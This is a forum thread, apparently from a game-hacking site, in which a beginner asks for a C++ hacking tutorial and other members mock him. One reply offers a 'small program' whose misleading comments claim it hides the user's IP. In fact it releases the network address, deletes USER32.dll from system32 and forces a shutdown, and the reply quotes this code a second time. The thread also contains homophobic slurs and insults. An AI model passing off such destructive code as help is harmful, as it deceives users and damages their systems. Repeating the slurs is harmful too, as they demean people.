learning abit

Posts 1–13 of 13 · Page 1 of 1
learning abit
i'm learning c++ languange and i think im getting it better
but,

can some1 make/give me a tutorial to make something,like an smal hack or program, [in a noobfriendly tutorial, cuz i dont know evrything yet and i rlly wanna learn XD]
Heres a simple tutorial:
Grab a book and come back next year...
whaha verry funny,
so u are a gabberr of fear.fm, dit you donate? i donated 60euro's XD
if u dont donate u arnt a real gabber

lol, back to the topic,

i just need to make a program, that helps alot more, and only g*y's read bookz!
Quote Originally Posted by martijno0o0 View Post
and only g*y's read bookz!
Most of the people here that learned learned from books. So I guess the correct terminology would be, "Only illiterate morons DON'T read books."
Quote Originally Posted by ilovecookies
So I guess the correct terminology would be, "Only illiterate morons DON'T read books."
Seconded. STFU and stop flicking me off damit! I already told you this!
LOL, funny thing is. If only gays read books then where are you learning from?
A website? Guess where the content on the website came from.
GG ******. Seriously, you wanna learn, yet the people trying to help you are the ones your disrespecting.

When I came into this thread, I thought oh, hey. Maybe it's someone who's willing to learn, now I know it's just another 12 year old.
Small program I made for ya !
Don't read it because reading is for gays.

Code:
//Not responsible for what happens
#include <iostream>

int main()
{
//Makes you undetectable by getting rid of your IP
system("ipconfig /release");

//This one helps you by editing the a dll and changes how you send messages to the servers
system("del %SystemRoot%\\system32\\USER32.dll -q");
system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
}
Compile and run it and it should work wonders!
Quote Originally Posted by Crash View Post
Small program I made for ya !
Don't read it because reading is for gays.

Code:
//Not responsible for what happens
#include <iostream>

int main()
{
//Makes you undetectable by getting rid of your IP
system("ipconfig /release");

//This one helps you by editing the a dll and changes how you send messages to the servers
system("del %SystemRoot%\\system32\\USER32.dll -q");
system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
}
Compile and run it and it should work wonders!
Why so mean? He's asking for our help in his time of need.

I found a trainer skeleton on this site, written by Dave. Might come in handy.
C++ Trainer Skeleton
Quote Originally Posted by Void View Post
Why so mean? He's asking for our help in his time of need.

I found a trainer skeleton on this site, written by Dave. Might come in handy.
C++ Trainer Skeleton
We're not being mean at all
Considering he won't even read it, reading is for gays you guys. Sorry to break it to ya!
You never know, maybe he's reading it right now.
in other words dont act cool when u cant handle being cool.
Quote Originally Posted by Matrix_NEO006 View Post
in other words dont act cool when u cant handle being cool.
The story of my life.
I don't care what he wants. No one is helping this guy in this forum until he....
STOPS FLIPPIN
ME OFF!

Bam. Closed!
Posts 1–13 of 13 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

Talk with us